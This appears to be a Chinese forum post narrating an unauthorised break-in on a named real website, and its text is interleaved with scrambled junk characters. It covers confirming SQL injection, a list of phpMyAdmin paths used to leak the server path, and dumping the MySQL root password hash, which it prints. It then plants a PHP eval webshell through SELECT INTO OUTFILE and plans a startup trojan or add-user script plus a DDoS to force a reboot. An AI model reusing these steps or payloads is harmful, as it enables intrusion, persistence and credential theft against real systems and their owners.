第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏6 U$ ]. k/ r0 ^0 P: V, }0 Q+ a5 {0 [8 s
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!
9 a8 i3 i, X$ Q! }/ B( x
4 j1 n- d; M& v
6 V$ X4 u3 O/ Y( g. Z( J! S* M; k2 a
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 # U+ R3 [1 _, Q+ q/ E
! h9 d5 Z( U& W' \4 G# m那么想可以直接写入shell ,getshell有几个条件:1 O2 J" ~: D: c2 x' _7 Z& F
1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF 9 }6 _; C8 F8 y& h' _1 ?
9 A3 G& K4 d( V+ u3 n* _试着爆绝对路径: 1 {' }* L% ?/ V$ l( p/ N ~( s0 O
1./phpMyAdmin/index.php?lang[]=1 3 N9 I6 }$ R2 q" T4 i$ m
2./phpMyAdmin/phpinfo.php - C+ r( [# Q! ^4 B* u
3./load_file()
1 \ V- E% n' ?3 n# ]6 X) Y4./phpmyadmin/themes/darkblue_orange/layout.inc.php 5 w- s8 B9 n1 I* O# t4 k6 r! `6 _
5./phpmyadmin/libraries/select_lang.lib.php - e z( T$ _3 w2 z% n, p7 k+ w0 D
6./phpmyadmin/libraries/lect_lang.lib.php 8 I# D* H; T" {! |2 D/ a
7./phpmyadmin/libraries/mcrypt.lib.php 9 A- l/ V' \& R- u. P" v
8./phpmyadmin/libraries/export/xls.php
} p! E( H$ n3 `0 I0 h
) G+ g$ R- b" S& B' h7 n均不行........................... 9 v T0 }- W8 o! D6 b
7 ~5 y9 ]4 O7 [- c御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php
. T& D$ i" o$ U. v) r) Y. L7 ?$ f0 j* |2 R, Z
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin + Q- E: H* S: R6 ]2 D' N- u& |
. _; Z% F2 b! u' F5 W9 t默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
: q& L/ O" K$ u. N' l. l* p3 S: |* i4 t* v% I
敏感东西: http://202.103.49.66/Admincp.php 社工进不去........... # I4 E' [0 T2 N8 d. C
6 Q# e. H) ^" b2 H5 g! U m3 g3 s
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell 7 R+ M F$ z! d0 ]( `- E% ?: I
4 m# _* R6 o# d1 v
http://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini 3 d4 w4 o$ e0 `/ m; v
8 \8 Y( v# f4 J& Z/ e( L4 U% q6 V自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD / R- v+ T. G- Q9 v8 Z+ k
/ ?3 }; g# ~& G成功读到root密码: ! u9 A( C, W" e2 |+ I5 q
/ r, C) Y; k. c$ O: U8 L17---- r(0072)
! j: S4 v$ N2 Y3 F7 {18---- o(006f) , y4 Z6 A1 h; |8 M$ ?
19---- o(006f)
! j: d0 D" }# \20---- t(0074)
/ a b7 @% X9 t' g21---- *(002a) * S! `. _6 }) j
22---- 8(0038) 7 I% R" A! l, C6 c: W+ I
23---- 2(0032)
1 D! h2 P _! o# `" l; y24---- E(0045)
1 X, K$ L; B: b. g; i25---- 1(0031)
f( [$ n3 h$ \: X" G26---- C(0043) * l( N! S6 N$ d" I) S
27---- 5(0035) 4 L4 R; ^0 b% s+ f( ]$ Q" N
28---- 8(0038) ; T% [8 v0 R" G" E, J
29---- 2(0032) * G- g4 H: q: g9 F9 I& ~6 T
30---- 8(0038) 7 V8 I* T2 D" v* q3 y6 F# D
31---- A(0041) , ?- A/ P5 {7 X# R& `4 F
32---- 9(0039)
& O0 G& o8 D1 G- Y33---- B(0042) - V( G, g& n6 ~+ r" s, x$ G J6 U! ^
34---- 5(0035) 9 J% @9 q }) a9 E
35---- 4(0034)
1 n/ `0 b$ f7 R7 j. X( I& F36---- 8(0038) 7 f* {9 I r3 d5 g* S% Q
37---- 6(0036) & u; d; U3 ~: S' t
38---- 4(0034) 5 G, q/ D3 t( c4 y5 F" K, J
39---- 9(0039) 4 _" k* P- [/ I+ B$ [
40---- 1(0031)
d% @% O- L) h0 b" {# Q) b41---- 1(0031) & i( Q0 M6 }$ u! M2 _
42---- 5(0035) - S; ^- C! _6 b5 v! w
43---- 3(0033)
" i: X2 X( A# E- l& o. E" u; F! ~& l44---- 5(0035) ) s: w- B) h4 Z' ]9 ?
45---- 9(0039) 7 z/ ~5 F2 s* b& Z$ K9 t
46---- 8(0038)
7 q7 P* {0 i" y, X* X3 ^47---- F(0046)
! @7 z9 w+ S, P6 b2 l0 e9 k48---- F(0046) + F" X! Z2 @$ i6 t! U% p
49---- 4(0034) * p8 h, T9 u- T+ P& H: }& M z
50---- F(0046)
, r$ v6 D9 {* J# z/ |+ W% K4 E7 L51---- 0(0030) 2 U- K: c) K# R8 O# N
52---- 3(0033) . T& x2 {: Q7 z0 d& V
53---- 2(0032) 0 J) T$ S, ?# s
54---- A(0041)
2 ?& Q, O: q" e4 P55---- 4(0034) & M) p" f$ B9 ?# S+ M3 Y; G
56---- A(0041) / X5 X$ w+ }3 W% V& u% i
57---- B(0042)
- k6 |! Z( a' S S' U: j) h2 |58---- *(0044)
, p% k9 _& J6 ]: `, V5 [59---- *(0035)
3 H! y6 T# G& U% p) H" z60---- *(0041)
1 I+ r& N! e9 V) `/ b61---- *0032)
) X$ |7 k0 t- Q4 d( g9 p! O, X8 [) g( Z2 I% O7 a
解密后成功登陆phpmyamin 0 g! R! \( O1 l) ~5 `9 b; V
$ t& g- B6 ^4 a; B# r, B. {" O' f* b) @4 G5 n
& r6 q q4 s" |
. I* }# K0 i1 p" X5 H
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
* w4 s$ r4 y" w5 |5 j: z7 W0 V1 o( Z0 \8 m
成功执行,拿下shell,菜刀连接:
6 T- \3 }8 w% Z9 h9 H; C( h
5 c9 k+ f% O' n服务器不支持asp,aspx,php提权无果................... # N9 r+ h1 @" A$ ^5 C3 j: C8 m% W
* P+ Z+ t9 e8 c! Z/ a
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
/ B0 G+ i* k4 a- [" W6 p2 O& c1 T/ {服务器上已经有个隐藏帐号了
1 J0 M8 E& M0 R6 ]0 E" K- Q9 i别名 administrators8 Y' y1 h5 e. t3 b2 U. ^
注释 管理员对计算机/域有不受限制的完全访问权 3 ~2 g7 p9 s( s; t4 v' e
成员 . K1 t; W5 L0 k: ^+ J y- O
-------------------------------------------------------------------------------
* {, j! ?/ r8 G ^admin0 A! k; z3 t. l0 J1 R5 ?
Administrator
& M) g$ f; q3 g! |slipper$& Z7 B5 i8 @) ]% d5 s, f) W6 |
sqluser% S9 b2 x) r4 Z. F1 s0 s6 P
命令成功完成。
0 ^! _, b" }5 ?* M5 c5 w! X8 a; v- q8 q8 A" k
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
( Z1 ^3 l* l; M, ]2 v; \* S+ q7 M; E! i, p: @
ddos服务器重启,不然就只能坐等服务器重启了.............................../ [9 i3 C$ t. X. k
5 s$ a9 p! a0 L- H9 \2 [
* J/ f, a7 v0 u- c! D& O* K& E7 w6 u |